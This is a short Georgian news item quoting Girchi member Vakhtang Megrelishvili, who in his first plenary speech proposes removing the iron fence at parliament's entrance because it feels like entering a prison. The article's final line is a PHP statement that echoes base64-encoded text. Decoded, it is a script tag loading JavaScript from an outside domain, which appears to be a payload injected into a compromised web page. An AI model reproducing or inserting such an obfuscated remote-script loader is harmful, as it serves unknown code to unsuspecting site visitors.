celsiusi
ავერსი საქკაბელი

როგორც „გირჩის“ წევრმა ვახტანგ მეგრელიშვილმა განაცხადა, პარლამენტის შესასვლელში განთავსებული რკინის ღობე მას ციხის შესასვლეს აგონებს და დეპუტატებს კონსენსუსით მისი აღება შესთავაზა. 

 
 "დღეს, ჩემი პირველი გამოსვლაა ამ დარბაზში და რამე სასაცილოს თუ ვიტყვი, გთხოვთ არ დამცინოთ. ბევრი რამის თქმა მინდოდა, გუშინ ვლაპარაკობდით კიდეც, რა არის ისეთი მნიშვნელოვანი თემა, რაც შეიძლება, რომ ვთქვა. მართალი გითხრათ, ბევრი ვერაფერი მოვიფიქრე. გადავწყვიტე, რაც ძალიან მაწუხებს ის გითხრათ: ძალიან მაწუხებს შემოსასვლელში რკინის ღობე. ყოველ დილას რომ უყურებ, ისეთი განცდა გაქვს, ციხეში შედიხარ. ციხეში შესვლა ყოველ დილას არ მინდა. ამის გამო თქვენთან დავიწყე კომუნიკაცია, ყველაზე მარტივი გადაწყვეტილება მინდა, შემოგთავაზოთ, იქნებ, ის ღობე ავიღოთ კონსენსუსით", – განაცხადა მეგრელიშვილმა პარლამენტში პლენარულ სხდომაზე. 
 
 
1367
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");